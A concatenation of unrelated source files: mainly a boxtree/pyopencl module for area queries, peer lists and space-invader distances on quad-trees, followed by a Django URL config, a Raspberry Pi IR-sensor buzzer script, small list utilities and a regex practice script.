bool is_overlapping;
${check_l_infty_ball_overlap(
"is_overlapping", "walk_box_id",
"ball_radius", "ball_center")}
if (is_overlapping)
{
${leaf_found_op(
"walk_box_id", "ball_center", "ball_radius")}
}
}
else
{
// We want to descend into this box. Put the current state
// on the stack.
${walk_push("walk_box_id")}
continue;
}
}
${walk_advance()}
}
}
}
"""
AREA_QUERY_TEMPLATE = (
GUIDING_BOX_FINDER_MACRO + r"""//CL//
typedef ${dtype_to_ctype(ball_id_dtype)} ball_id_t;
typedef ${dtype_to_ctype(peer_list_idx_dtype)} peer_list_idx_t;
<%def name="get_ball_center_and_radius(ball_center, ball_radius, i)">
%for ax in AXIS_NAMES[:dimensions]:
${ball_center}.${ax} = ball_${ax}[${i}];
%endfor
${ball_radius} = ball_radii[${i}];
</%def>
<%def name="leaf_found_op(leaf_box_id, ball_center, ball_radius)">
APPEND_leaves(${leaf_box_id});
</%def>
void generate(LIST_ARG_DECL USER_ARG_DECL ball_id_t i)
{
"""
+ AREA_QUERY_WALKER_BODY
+ """
}
""")
PEER_LIST_FINDER_TEMPLATE = r"""//CL//
void generate(LIST_ARG_DECL USER_ARG_DECL box_id_t box_id)
{
${load_center("center", "box_id")}
if (box_id == 0)
{
// Peer of root = self
APPEND_peers(box_id);
return;
}
int level = box_levels[box_id];
// To find this box's peers, start at the top of the tree, descend
// into adjacent (or overlapping) parents.
${walk_init(0)}
while (continue_walk)
{
${walk_get_box_id()}
if (walk_box_id)
{
${load_center("walk_center", "walk_box_id")}
// walk_box_id lives on level walk_stack_size+1.
bool a_or_o = is_adjacent_or_overlapping(root_extent,
center, level, walk_center, walk_stack_size+1);
if (a_or_o)
{
// walk_box_id lives on level walk_stack_size+1.
if (walk_stack_size+1 == level)
{
APPEND_peers(walk_box_id);
}
else if (!(box_flags[walk_box_id]
& BOX_HAS_SOURCE_OR_TARGET_CHILD_BOXES))
{
APPEND_peers(walk_box_id);
}
else
{
// Check if any children are adjacent or overlapping.
// If not, this box must be a peer.
bool must_be_peer = true;
for (int morton_nr = 0;
must_be_peer && morton_nr < ${2**dimensions};
++morton_nr)
{
box_id_t next_child_id = box_child_ids[
morton_nr * aligned_nboxes + walk_box_id];
if (next_child_id)
{
${load_center("next_walk_center", "next_child_id")}
must_be_peer &= !is_adjacent_or_overlapping(root_extent,
center, level, next_walk_center, walk_stack_size+2);
}
}
if (must_be_peer)
{
APPEND_peers(walk_box_id);
}
else
{
// We want to descend into this box. Put the current state
// on the stack.
${walk_push("walk_box_id")}
continue;
}
}
}
}
${walk_advance()}
}
}
"""
from pyopencl.elementwise import ElementwiseTemplate
from boxtree.tools import InlineBinarySearch
STARTS_EXPANDER_TEMPLATE = ElementwiseTemplate(
arguments=r"""
idx_t *dst,
idx_t *starts,
idx_t starts_len
""",
operation=r"""//CL//
/* Find my index in starts, place the index in dst. */
dst[i] = bsearch(starts, starts_len, i);
""",
name="starts_expander",
preamble=str(InlineBinarySearch("idx_t")))
# }}}
# {{{ area query elementwise template
class AreaQueryElementwiseTemplate:
    """
    Experimental: Intended as a way to perform operations in the body of an area
    query.
    """
    @staticmethod
    def unwrap_args(tree, peer_lists, *args):
        # Fixed argument prefix that every area-query elementwise kernel
        # receives (tree geometry, flags, peer lists, bounding-box minimum);
        # caller-supplied extra args are appended after it.
        return (tree.box_centers,
                tree.root_extent,
                tree.box_levels,
                tree.aligned_nboxes,
                tree.box_child_ids,
                tree.box_flags,
                peer_lists.peer_list_starts,
                peer_lists.peer_lists) + tuple(tree.bounding_box[0]) + args
    def __init__(self, extra_args, ball_center_and_radius_expr,
                 leaf_found_op, preamble="", name="area_query_elwise"):
        """Assemble an elementwise kernel template around the area-query walker.

        :arg extra_args: kernel argument declarations appended after the
            fixed prefix (see :meth:`unwrap_args`); Mako-expanded.
        :arg ball_center_and_radius_expr: Mako body that fills the
            ``ball_center``/``ball_radius`` variables for work item ``i``.
        :arg leaf_found_op: Mako body run for every leaf box overlapping
            the ball.
        """
        def wrap_in_macro(decl, expr):
            return """
            <%def name=\"{decl}\">
            {expr}
            </%def>
            """.format(decl=decl, expr=expr)
        from boxtree.traversal import TRAVERSAL_PREAMBLE_MAKO_DEFS
        self.elwise_template = ElementwiseTemplate(
            arguments=r"""//CL:mako//
                coord_t *box_centers,
                coord_t root_extent,
                box_level_t *box_levels,
                box_id_t aligned_nboxes,
                box_id_t *box_child_ids,
                box_flags_t *box_flags,
                peer_list_idx_t *peer_list_starts,
                box_id_t *peer_lists,
                %for ax in AXIS_NAMES[:dimensions]:
                    coord_t bbox_min_${ax},
                %endfor
            """ + extra_args,
            operation="//CL:mako//\n"
            + wrap_in_macro(
                "get_ball_center_and_radius(ball_center, ball_radius, i)",
                ball_center_and_radius_expr)
            + wrap_in_macro(
                "leaf_found_op(leaf_box_id, ball_center, ball_radius)",
                leaf_found_op)
            + TRAVERSAL_PREAMBLE_MAKO_DEFS
            + GUIDING_BOX_FINDER_MACRO
            + AREA_QUERY_WALKER_BODY,
            name=name,
            preamble=preamble)
    def generate(self, context,
                 dimensions, coord_dtype, box_id_dtype,
                 peer_list_idx_dtype, max_levels,
                 extra_var_values=(), extra_type_aliases=(),
                 extra_preamble=""):
        """Render and build the kernel for the given dtypes/dimensionality."""
        from pyopencl.cltypes import vec_types
        from pyopencl.tools import dtype_to_ctype
        from boxtree import box_flags_enum
        from boxtree.traversal import TRAVERSAL_PREAMBLE_TYPEDEFS_AND_DEFINES
        from boxtree.tree_build import TreeBuilder
        render_vars = (
            ("np", np),
            ("dimensions", dimensions),
            ("dtype_to_ctype", dtype_to_ctype),
            ("box_id_dtype", box_id_dtype),
            ("particle_id_dtype", None),
            ("coord_dtype", coord_dtype),
            ("get_coord_vec_dtype", get_coord_vec_dtype),
            ("cvec_sub", partial(coord_vec_subscript_code, dimensions)),
            ("max_levels", max_levels),
            ("AXIS_NAMES", AXIS_NAMES),
            ("box_flags_enum", box_flags_enum),
            ("peer_list_idx_dtype", peer_list_idx_dtype),
            ("debug", False),
            ("root_extent_stretch_factor", TreeBuilder.ROOT_EXTENT_STRETCH_FACTOR),
            # FIXME This gets used in pytential with a template that still uses this:
            ("vec_types", tuple(vec_types.items())),
        )
        preamble = Template(
            # HACK: box_flags_t and coord_t are defined here and
            # in the template below, so disable typedef redefinition warnings.
            """
            #pragma clang diagnostic push
            #pragma clang diagnostic ignored "-Wtypedef-redefinition"
            """
            + TRAVERSAL_PREAMBLE_TYPEDEFS_AND_DEFINES
            + """
            #pragma clang diagnostic pop
            """,
            strict_undefined=True).render(**dict(render_vars))
        return self.elwise_template.build(context,
            type_aliases=(
                ("coord_t", coord_dtype),
                ("box_id_t", box_id_dtype),
                ("peer_list_idx_t", peer_list_idx_dtype),
                ("box_level_t", np.uint8),
                ("box_flags_t", box_flags_enum.dtype),
            ) + extra_type_aliases,
            var_values=render_vars + extra_var_values,
            more_preamble=preamble + extra_preamble)
SPACE_INVADER_QUERY_TEMPLATE = AreaQueryElementwiseTemplate(
extra_args="""
coord_t *ball_radii,
float *outer_space_invader_dists,
%for ax in AXIS_NAMES[:dimensions]:
coord_t *ball_${ax},
%endfor
""",
ball_center_and_radius_expr=r"""
${ball_radius} = ball_radii[${i}];
%for ax in AXIS_NAMES[:dimensions]:
${ball_center}.${ax} = ball_${ax}[${i}];
%endfor
""",
leaf_found_op=r"""
{
${load_center("leaf_center", leaf_box_id)}
coord_t max_dist = 0;
%for i in range(dimensions):
max_dist = fmax(max_dist,
distance(
${cvec_sub(ball_center, i)},
${cvec_sub("leaf_center", i)}));
%endfor
// The atomic max operation supports only integer types.
// However, max_dist is of a floating point type.
// For comparison purposes we reinterpret the bits of max_dist
// as an integer. The comparison result is the same as for positive
// IEEE floating point numbers, so long as the float/int endianness
// matches (fingers crossed).
atomic_max(
(volatile __global int *)
&outer_space_invader_dists[${leaf_box_id}],
as_int((float) max_dist));
}""",
name="space_invader_query")
# }}}
# {{{ area query build
class AreaQueryBuilder:
    r"""Given a set of :math:`l^\infty` "balls", this class helps build a
    look-up table from ball to leaf boxes that intersect with the ball.
    .. versionadded:: 2016.1
    .. automethod:: __init__
    .. automethod:: __call__
    """
    def __init__(self, context):
        """:arg context: a :class:`pyopencl.Context`."""
        self.context = context
        self.peer_list_finder = PeerListFinder(self.context)
    # {{{ Kernel generation
    @memoize_method
    def get_area_query_kernel(self, dimensions, coord_dtype, box_id_dtype,
            ball_id_dtype, peer_list_idx_dtype, max_levels):
        """Build (and memoize) the area-query list builder for these dtypes."""
        from pyopencl.tools import dtype_to_ctype
        from boxtree import box_flags_enum
        logger.debug("start building area query kernel")
        from boxtree.traversal import TRAVERSAL_PREAMBLE_TEMPLATE
        from boxtree.tree_build import TreeBuilder
        template = Template(
            TRAVERSAL_PREAMBLE_TEMPLATE
            + AREA_QUERY_TEMPLATE,
            strict_undefined=True)
        render_vars = {
            "np": np,
            "dimensions": dimensions,
            "dtype_to_ctype": dtype_to_ctype,
            "box_id_dtype": box_id_dtype,
            "particle_id_dtype": None,
            "coord_dtype": coord_dtype,
            "get_coord_vec_dtype": get_coord_vec_dtype,
            "cvec_sub": partial(coord_vec_subscript_code, dimensions),
            "max_levels": max_levels,
            "AXIS_NAMES": AXIS_NAMES,
            "box_flags_enum": box_flags_enum,
            "peer_list_idx_dtype": peer_list_idx_dtype,
            "ball_id_dtype": ball_id_dtype,
            "debug": False,
            "root_extent_stretch_factor": TreeBuilder.ROOT_EXTENT_STRETCH_FACTOR,
        }
        from boxtree.tools import ScalarArg, VectorArg
        # Argument order must match the call in __call__ below.
        arg_decls = [
            VectorArg(coord_dtype, "box_centers", with_offset=False),
            ScalarArg(coord_dtype, "root_extent"),
            VectorArg(np.uint8, "box_levels"),
            ScalarArg(box_id_dtype, "aligned_nboxes"),
            VectorArg(box_id_dtype, "box_child_ids", with_offset=False),
            VectorArg(box_flags_enum.dtype, "box_flags"),
            VectorArg(peer_list_idx_dtype, "peer_list_starts"),
            VectorArg(box_id_dtype, "peer_lists"),
            VectorArg(coord_dtype, "ball_radii"),
        ] + [
            ScalarArg(coord_dtype, "bbox_min_"+ax)
            for ax in AXIS_NAMES[:dimensions]
        ] + [
            VectorArg(coord_dtype, "ball_"+ax)
            for ax in AXIS_NAMES[:dimensions]]
        from pyopencl.algorithm import ListOfListsBuilder
        area_query_kernel = ListOfListsBuilder(
            self.context,
            [("leaves", box_id_dtype)],
            str(template.render(**render_vars)),
            arg_decls=arg_decls,
            name_prefix="area_query",
            count_sharing={},
            complex_kernel=True)
        logger.debug("done building area query kernel")
        return area_query_kernel
    # }}}
    def __call__(self, queue, tree, ball_centers, ball_radii, peer_lists=None,
                 wait_for=None):
        """
        :arg queue: a :class:`pyopencl.CommandQueue`
        :arg tree: a :class:`boxtree.Tree`.
        :arg ball_centers: an object array of coordinate
            :class:`pyopencl.array.Array` instances.
            Their *dtype* must match *tree*'s
            :attr:`boxtree.Tree.coord_dtype`.
        :arg ball_radii: a
            :class:`pyopencl.array.Array`
            of positive numbers.
            Its *dtype* must match *tree*'s
            :attr:`boxtree.Tree.coord_dtype`.
        :arg peer_lists: may either be *None* or an instance of
            :class:`PeerListLookup` associated with `tree`.
        :arg wait_for: may either be *None* or a list of :class:`pyopencl.Event`
            instances for whose completion this command waits before starting
            execution.
        :returns: a tuple *(aq, event)*, where *aq* is an instance of
            :class:`AreaQueryResult`, and *event* is a :class:`pyopencl.Event`
            for dependency management.
        """
        from pytools import single_valued
        if single_valued(bc.dtype for bc in ball_centers) != tree.coord_dtype:
            raise TypeError("ball_centers dtype must match tree.coord_dtype")
        if ball_radii.dtype != tree.coord_dtype:
            raise TypeError("ball_radii dtype must match tree.coord_dtype")
        # No dedicated ball index type exists; the particle index type is
        # presumed wide enough -- hence the original "?" marker.
        ball_id_dtype = tree.particle_id_dtype  # ?
        from pytools import div_ceil
        # Avoid generating too many kernels.
        max_levels = div_ceil(tree.nlevels, 10) * 10
        if peer_lists is None:
            peer_lists, evt = self.peer_list_finder(queue, tree, wait_for=wait_for)
            wait_for = [evt]
        if len(peer_lists.peer_list_starts) != tree.nboxes + 1:
            raise ValueError("size of peer lists must match with number of boxes")
        area_query_kernel = self.get_area_query_kernel(tree.dimensions,
            tree.coord_dtype, tree.box_id_dtype, ball_id_dtype,
            peer_lists.peer_list_starts.dtype, max_levels)
        aq_plog = ProcessLogger(logger, "area query")
        result, evt = area_query_kernel(
                queue, len(ball_radii),
                tree.box_centers.data, tree.root_extent,
                tree.box_levels, tree.aligned_nboxes,
                tree.box_child_ids.data, tree.box_flags,
                peer_lists.peer_list_starts,
                peer_lists.peer_lists, ball_radii,
                *(tuple(tree.bounding_box[0])
                    + tuple(bc for bc in ball_centers)),
                wait_for=wait_for)
        aq_plog.done()
        return AreaQueryResult(
                tree=tree,
                leaves_near_ball_starts=result["leaves"].starts,
                leaves_near_ball_lists=result["leaves"].lists).with_queue(None), evt
# {{{ area query transpose (leaves-to-balls) lookup build
class LeavesToBallsLookupBuilder:
    r"""Given a set of :math:`l^\infty` "balls", this class helps build a
    look-up table from leaf boxes to balls that overlap with each leaf box.
    .. automethod:: __init__
    .. automethod:: __call__
    """
    def __init__(self, context):
        """:arg context: a :class:`pyopencl.Context`."""
        self.context = context
        from pyopencl.algorithm import KeyValueSorter
        self.key_value_sorter = KeyValueSorter(context)
        self.area_query_builder = AreaQueryBuilder(context)
    @memoize_method
    def get_starts_expander_kernel(self, idx_dtype):
        """
        Expands a "starts" array into a length starts[-1] array of increasing
        indices:
        Eg: [0 2 5 6] => [0 0 1 1 1 2]
        """
        return STARTS_EXPANDER_TEMPLATE.build(
               self.context,
               type_aliases=(("idx_t", idx_dtype),))
    def __call__(self, queue, tree, ball_centers, ball_radii, peer_lists=None,
                 wait_for=None):
        """
        :arg queue: a :class:`pyopencl.CommandQueue`
        :arg tree: a :class:`boxtree.Tree`.
        :arg ball_centers: an object array of coordinate
            :class:`pyopencl.array.Array` instances.
            Their *dtype* must match *tree*'s
            :attr:`boxtree.Tree.coord_dtype`.
        :arg ball_radii: a
            :class:`pyopencl.array.Array`
            of positive numbers.
            Its *dtype* must match *tree*'s
            :attr:`boxtree.Tree.coord_dtype`.
        :arg peer_lists: may either be *None* or an instance of
            :class:`PeerListLookup` associated with `tree`.
        :arg wait_for: may either be *None* or a list of :class:`pyopencl.Event`
            instances for whose completion this command waits before starting
            execution.
        :returns: a tuple *(lbl, event)*, where *lbl* is an instance of
            :class:`LeavesToBallsLookup`, and *event* is a :class:`pyopencl.Event`
            for dependency management.
        """
        from pytools import single_valued
        if single_valued(bc.dtype for bc in ball_centers) != tree.coord_dtype:
            raise TypeError("ball_centers dtype must match tree.coord_dtype")
        if ball_radii.dtype != tree.coord_dtype:
            raise TypeError("ball_radii dtype must match tree.coord_dtype")
        ltb_plog = ProcessLogger(logger, "leaves-to-balls lookup: run area query")
        area_query, evt = self.area_query_builder(
                queue, tree, ball_centers, ball_radii, peer_lists, wait_for)
        wait_for = [evt]
        logger.debug("leaves-to-balls lookup: expand starts")
        nkeys = tree.nboxes
        nballs_p_1 = len(area_query.leaves_near_ball_starts)
        assert nballs_p_1 == len(ball_radii) + 1
        # We invert the area query in two steps:
        #
        # 1. Turn the area query result into (ball number, box number) pairs.
        #    This is done in the "starts expander kernel."
        #
        # 2. Key-value sort the (ball number, box number) pairs by box number.
        starts_expander_knl = self.get_starts_expander_kernel(tree.box_id_dtype)
        expanded_starts = cl.array.empty(
                queue, len(area_query.leaves_near_ball_lists), tree.box_id_dtype)
        evt = starts_expander_knl(
                expanded_starts,
                area_query.leaves_near_ball_starts.with_queue(queue),
                nballs_p_1)
        wait_for = [evt]
        logger.debug("leaves-to-balls lookup: key-value sort")
        balls_near_box_starts, balls_near_box_lists, evt \
                = self.key_value_sorter(
                        queue,
                        # keys
                        area_query.leaves_near_ball_lists.with_queue(queue),
                        # values
                        expanded_starts,
                        nkeys, starts_dtype=tree.box_id_dtype,
                        wait_for=wait_for)
        ltb_plog.done()
        return LeavesToBallsLookup(
                tree=tree,
                balls_near_box_starts=balls_near_box_starts,
                balls_near_box_lists=balls_near_box_lists).with_queue(None), evt
# }}}
# {{{ space invader query build
class SpaceInvaderQueryBuilder:
    r"""
    Given a set of :math:`l^\infty` "balls", this class helps build a look-up
    table which maps leaf boxes to the *outer space invader distance*.
    This is defined below but roughly, from the point of view
    of a leaf box, it is the farthest "leaf center to ball center" distance among
    all balls that intersect the leaf box.
    Formally, given a leaf box :math:`b`, the *outer space invader distance* is
    defined by the following expression (here :math:`d_\infty` is the
    :math:`\infty` norm):
    .. math::
        \max \left( \{ d_{\infty}(\text{center}(b), \text{center}(b^*))
        : b^* \text{ is a ball}, b^* \cap b \neq \varnothing \}
        \cup \{ 0 \} \right)
    .. automethod:: __init__
    .. automethod:: __call__
    """
    def __init__(self, context):
        """:arg context: a :class:`pyopencl.Context`."""
        self.context = context
        self.peer_list_finder = PeerListFinder(self.context)
    # {{{ Kernel generation
    @memoize_method
    def get_space_invader_query_kernel(self, dimensions, coord_dtype,
                box_id_dtype, peer_list_idx_dtype, max_levels):
        """Build (and memoize) the space-invader kernel for these dtypes."""
        return SPACE_INVADER_QUERY_TEMPLATE.generate(
                self.context,
                dimensions,
                coord_dtype,
                box_id_dtype,
                peer_list_idx_dtype,
                max_levels)
    # }}}
    def __call__(self, queue, tree, ball_centers, ball_radii, peer_lists=None,
                 wait_for=None):
        """
        :arg queue: a :class:`pyopencl.CommandQueue`
        :arg tree: a :class:`boxtree.Tree`.
        :arg ball_centers: an object array of coordinate
            :class:`pyopencl.array.Array` instances.
            Their *dtype* must match *tree*'s
            :attr:`boxtree.Tree.coord_dtype`.
        :arg ball_radii: a
            :class:`pyopencl.array.Array`
            of positive numbers.
            Its *dtype* must match *tree*'s
            :attr:`boxtree.Tree.coord_dtype`.
        :arg peer_lists: may either be *None* or an instance of
            :class:`PeerListLookup` associated with `tree`.
        :arg wait_for: may either be *None* or a list of :class:`pyopencl.Event`
            instances for whose completion this command waits before starting
            execution.
        :returns: a tuple *(sqi, event)*, where *sqi* is an instance of
            :class:`pyopencl.array.Array`, and *event* is a :class:`pyopencl.Event`
            for dependency management. The *dtype* of *sqi* is
            *tree*'s :attr:`boxtree.Tree.coord_dtype` and its shape is
            *(tree.nboxes,)* (see :attr:`boxtree.Tree.nboxes`).
            The entries of *sqi* are indexed by the global box index and are
            as follows:
            * if *i* is not the index of a leaf box, *sqi[i] = 0*.
            * if *i* is the index of a leaf box, *sqi[i]* is the
              outer space invader distance for *i*.
        """
        from pytools import single_valued
        if single_valued(bc.dtype for bc in ball_centers) != tree.coord_dtype:
            raise TypeError("ball_centers dtype must match tree.coord_dtype")
        if ball_radii.dtype != tree.coord_dtype:
            raise TypeError("ball_radii dtype must match tree.coord_dtype")
        from pytools import div_ceil
        # Avoid generating too many kernels.
        max_levels = div_ceil(tree.nlevels, 10) * 10
        if peer_lists is None:
            peer_lists, evt = self.peer_list_finder(queue, tree, wait_for=wait_for)
            wait_for = [evt]
        if len(peer_lists.peer_list_starts) != tree.nboxes + 1:
            raise ValueError("size of peer lists must match with number of boxes")
        space_invader_query_kernel = self.get_space_invader_query_kernel(
            tree.dimensions, tree.coord_dtype, tree.box_id_dtype,
            peer_lists.peer_list_starts.dtype, max_levels)
        si_plog = ProcessLogger(logger, "space invader query")
        # float32 output: the kernel's atomic max works on int bits only.
        outer_space_invader_dists = cl.array.zeros(queue, tree.nboxes, np.float32)
        if not wait_for:
            wait_for = []
        wait_for = (wait_for
                + outer_space_invader_dists.events
                + ball_radii.events
                + [evt for bc in ball_centers for evt in bc.events])
        evt = space_invader_query_kernel(
                *SPACE_INVADER_QUERY_TEMPLATE.unwrap_args(
                    tree, peer_lists,
                    ball_radii,
                    outer_space_invader_dists,
                    *tuple(bc for bc in ball_centers)),
                wait_for=wait_for,
                queue=queue,
                range=slice(len(ball_radii)))
        if tree.coord_dtype != np.dtype(np.float32):
            # The kernel output is always an array of float32 due to limited
            # support for atomic operations with float64 in OpenCL.
            # Here the output is cast to match the coord dtype.
            outer_space_invader_dists.finish()
            outer_space_invader_dists = outer_space_invader_dists.astype(
                    tree.coord_dtype)
            evt, = outer_space_invader_dists.events
        si_plog.done()
        return outer_space_invader_dists, evt
# }}}
# {{{ peer list build
class PeerListFinder:
    """This class builds a look-up table from box numbers to peer boxes. The
    full definition [1]_ of a peer box is as follows:

    Given a box :math:`b_j` in a quad-tree, :math:`b_k` is a peer box of
    :math:`b_j` if it is

    1. adjacent to :math:`b_j`,
    2. of at least the same size as :math:`b_j` (i.e. at the same or a
       higher level than), and
    3. no child of :math:`b_k` satisfies the above two criteria.

    .. [1] Rachh, Manas, Andreas Klöckner, and Michael O'Neil. "Fast
       algorithms for Quadrature by Expansion I: Globally valid expansions."

    .. versionadded:: 2016.1

    .. automethod:: __init__
    .. automethod:: __call__
    """
    def __init__(self, context):
        """
        :arg context: a :class:`pyopencl.Context`.
        """
        self.context = context
    # {{{ Kernel generation
    @memoize_method
    def get_peer_list_finder_kernel(self, dimensions, coord_dtype,
            box_id_dtype, max_levels):
        """Build (and memoize) the list-of-lists builder that emits, for each
        box, its list of peer boxes.
        """
        from pyopencl.tools import dtype_to_ctype
        from boxtree import box_flags_enum
        logger.debug("start building peer list finder kernel")
        from boxtree.traversal import (
            HELPER_FUNCTION_TEMPLATE, TRAVERSAL_PREAMBLE_TEMPLATE)
        # The peer-list source reuses the traversal preamble/helpers so it can
        # call the same adjacency predicates as the tree traversal code.
        template = Template(
            TRAVERSAL_PREAMBLE_TEMPLATE
            + HELPER_FUNCTION_TEMPLATE
            + PEER_LIST_FINDER_TEMPLATE,
            strict_undefined=True)
        render_vars = {
            "np": np,
            "dimensions": dimensions,
            "dtype_to_ctype": dtype_to_ctype,
            "box_id_dtype": box_id_dtype,
            "particle_id_dtype": None,
            "coord_dtype": coord_dtype,
            "get_coord_vec_dtype": get_coord_vec_dtype,
            "cvec_sub": partial(coord_vec_subscript_code, dimensions),
            "max_levels": max_levels,
            "AXIS_NAMES": AXIS_NAMES,
            "box_flags_enum": box_flags_enum,
            "debug": False,
            # For calls to the helper is_adjacent_or_overlapping()
            "targets_have_extent": False,
            "sources_have_extent": False,
        }
        from boxtree.tools import ScalarArg, VectorArg
        arg_decls = [
            VectorArg(coord_dtype, "box_centers", with_offset=False),
            ScalarArg(coord_dtype, "root_extent"),
            VectorArg(np.uint8, "box_levels"),
            ScalarArg(box_id_dtype, "aligned_nboxes"),
            VectorArg(box_id_dtype, "box_child_ids", with_offset=False),
            VectorArg(box_flags_enum.dtype, "box_flags"),
        ]
        from pyopencl.algorithm import ListOfListsBuilder
        peer_list_finder_kernel = ListOfListsBuilder(
            self.context,
            [("peers", box_id_dtype)],
            str(template.render(**render_vars)),
            arg_decls=arg_decls,
            name_prefix="find_peer_lists",
            count_sharing={},
            complex_kernel=True)
        logger.debug("done building peer list finder kernel")
        return peer_list_finder_kernel
    # }}}
    def __call__(self, queue, tree, wait_for=None):
        """
        :arg queue: a :class:`pyopencl.CommandQueue`
        :arg tree: a :class:`boxtree.Tree`.
        :arg wait_for: may either be *None* or a list of :class:`pyopencl.Event`
            instances for whose completion this command waits before starting
            execution.
        :returns: a tuple *(pl, event)*, where *pl* is an instance of
            :class:`PeerListLookup`, and *event* is a :class:`pyopencl.Event`
            for dependency management.
        """
        from pytools import div_ceil
        # Round up level count--this gets included in the kernel as
        # a stack bound. Rounding avoids too many kernel versions.
        max_levels = div_ceil(tree.nlevels, 10) * 10
        peer_list_finder_kernel = self.get_peer_list_finder_kernel(
            tree.dimensions, tree.coord_dtype, tree.box_id_dtype, max_levels)
        pl_plog = ProcessLogger(logger, "find peer lists")
        result, evt = peer_list_finder_kernel(
            queue, tree.nboxes,
            tree.box_centers.data, tree.root_extent,
            tree.box_levels, tree.aligned_nboxes,
            tree.box_child_ids.data, tree.box_flags,
            wait_for=wait_for)
        pl_plog.done()
        # with_queue(None) detaches the arrays from the queue for storage.
        return PeerListLookup(
            tree=tree,
            peer_list_starts=result["peers"].starts,
            peer_lists=result["peers"].lists).with_queue(None), evt
# }}}
# vim: fdm=marker
|
from django.urls import path

# Import the views explicitly: a wildcard import hides which names this
# module depends on and can silently shadow unrelated module-level names.
from Personas.api.views.person_views import (
    CompleteData,
    CreatePerson,
    GetLegalEntity,
    GetNaturalPerson,
    ListByInitial,
    RetrieveAddress,
)

# URL routes for the person API endpoints.
urlpatterns = [
    path("create-person/", CreatePerson.as_view(), name='create-person'),
    path("get-legal-entity/", GetLegalEntity.as_view(), name='get-legal-entity'),
    path("get-natural-person/", GetNaturalPerson.as_view(), name='get-natural-person'),
    path("complete-data/", CompleteData.as_view(), name='complete-data'),
    path("retrieve-address/", RetrieveAddress.as_view(), name='retrieve-address'),
    path("list-by-initial/", ListByInitial.as_view(), name='list-by-initial'),
]
from config.base_config import BaseConfig
# Configuration object backed by "sql.ini"; everything else is inherited.
class SqlConfig(BaseConfig):
    def __init__(self):
        super().__init__()
        # NOTE(review): self.file is assigned *after* super().__init__(), so
        # BaseConfig presumably reads the file lazily -- confirm.
        self.file = 'sql.ini'
import RPi.GPIO as GPIO
import time

# BCM pin assignments for the IR sensors and the buzzer.
glue_sensor = 9
stamp_sensor = 19
# NOTE(review): buzzer shares BCM pin 19 with stamp_sensor, so below the same
# pin is configured first as input and then as output (the output setup wins).
# This looks like a wiring/typo bug -- confirm the intended buzzer pin.
buzzer = 19

GPIO.setmode(GPIO.BCM)
GPIO.setup(glue_sensor, GPIO.IN)
GPIO.setup(stamp_sensor, GPIO.IN)
GPIO.setup(buzzer, GPIO.OUT)
GPIO.output(buzzer, False)
print("IR Sensors are Ready.....")
print(" ")
try:
    # Poll the glue IR sensor: a high reading means no object in front of the
    # sensor (active-low module); sound the buzzer while an object is present.
    # Using if/else instead of re-reading the pin in an elif avoids a race
    # where the level changes between the two reads and neither branch runs.
    while True:
        if GPIO.input(glue_sensor):
            GPIO.output(buzzer, False)
            print("Glue_Sensor Object not Detected")
        else:
            GPIO.output(buzzer, True)
            print("Glue_Sensor Object Detected ")
        time.sleep(0.003)
except KeyboardInterrupt:
    # Release all GPIO pins on Ctrl-C so the next run starts clean.
    GPIO.cleanup()
|
def UltimaSifra(x):
    """Print the number of characters in the decimal representation of x."""
    texto = str(x)
    longitud = len(texto)
    print (longitud)
def rotar(xs=None):
    """Rotate *xs* one position to the left, in place; return the list.

    The first element moves to the end.  Fixes two defects of the original:
    a shared mutable default argument (``xs=[]``) and an IndexError when
    called with an empty list.
    """
    if xs is None:
        xs = []
    if xs:
        xs.append(xs.pop(0))
    return xs
def rotarN(n, xs=None):
    """Rotate *xs* n positions to the left, in place; return the list.

    Non-positive *n* leaves the list unchanged (the original's
    ``range(0, n)`` loop did nothing for n <= 0).  Fixes the shared mutable
    default argument and performs the rotation with one slice assignment
    instead of n O(n) pops.
    """
    if xs is None:
        xs = []
    if xs and n > 0:
        k = n % len(xs)
        xs[:] = xs[k:] + xs[:k]
    return xs
def Rango(xs=None):
    """Append min(xs) and then max(xs) to *xs* in place; return the list.

    Fixes the shared mutable default argument of the original, and guards
    the empty list (the original raised ValueError from ``min([])``).
    """
    if xs is None:
        xs = []
    if xs:
        xs.append(min(xs))
        xs.append(max(xs))
    return xs
def Polinomio(xs=None):
    """Return True when *xs* has an odd number of elements, else False.

    Bug fix: the original reassigned ``xs = []`` at the top of the body,
    which made the parameter dead and the function always return False.
    The shared mutable default argument is fixed as well.
    """
    if xs is None:
        xs = []
    return len(xs) % 2 != 0
def TResIguales(x, y, z):
    """Return True when all three arguments are equal, else False.

    Python's chained comparison replaces the original nested if/else tree.
    """
    return x == y == z
|
import re

# Sample text mixing phone numbers, honorifics, e-mail addresses and URLs.
txt="""
abcd
bfcd
352-980-879
123.436.908
675*576*894
800-980-879
900-980-879
Mr.Dragon
Mr.Cheetah
Mr. Tiger
Mr L
Ms.Divya
Mrs Savithri
arunbond30@skype.com
arunbond30@skype*com
arun.s.kumar@techmahindra.com
arun&43@example.com
arun.teacher@cap.org
http://www.google.com
https://www.msn.com
http://youtube.org
"""
##########################################################################
# Quantifier refresher (a bare . is a "period"; \. escapes it):
#   *      0 or more
#   +      1 or more
#   ?      0 or 1  (marks the preceding token as optional)
#   {3}    exactly 3
#   {3,5}  between 3 and 5 (min, max)
# Groups: (...) lets several alternative patterns be matched and captured.
##########################################################################
# Earlier experiments, kept for reference:
#   r'\d{3}[-]\d{3}[-]\d{3}'                         phone numbers
#   r'Mr\.?\s?[a-zA-Z]\w*'                           "Mr" honorifics
#   r'M(r|s|rs)\.?\s?[a-zA-Z]\w*'                    honorifics via a group
#   r'(Mr|Ms|Mrs)\.?\s?[a-zA-Z]\w*'                  same, full alternation
#   r'[a-zA-Z][a-zA-Z0-9-.]+@[a-zA-Z]+\.(in|com)'    e-mail IDs
#   r'https?://(www\.)?[a-zA-Z]+\.[a-zA-Z]{2,10}'    websites
# Active pattern: URLs split into word-character groups --
# group(1) = optional "www.", group(2) = domain, group(3) = TLD.
ptrn=re.compile(r'https?://(www\.)?(\w+)\.(\w+)')
# Collect group(1) of every match (group(0) would be the whole match).
L1 = [m.group(1) for m in ptrn.finditer(txt)]
print(L1)
#!/usr/bin/python
# -*- coding: utf-8 -*-
from __future__ import print_function, unicode_literals


def solveIt():
    """Return a string that is the screen name you would like."""
    return 'wkschwartz'


if __name__ == '__main__':
    screen_name = solveIt()
    print('This script submits the screen name:', screen_name)
'''
Created on 14 nov. 2012
@author: naamane.othmane
'''
from django.contrib.auth.models import User
from django import forms
from django.utils.translation import ugettext_lazy as _
from my_forum.models import Thread,Post
from crispy_forms.helper import FormHelper
from crispy_forms.layout import Layout, Submit, HTML
from crispy_forms.bootstrap import FormActions
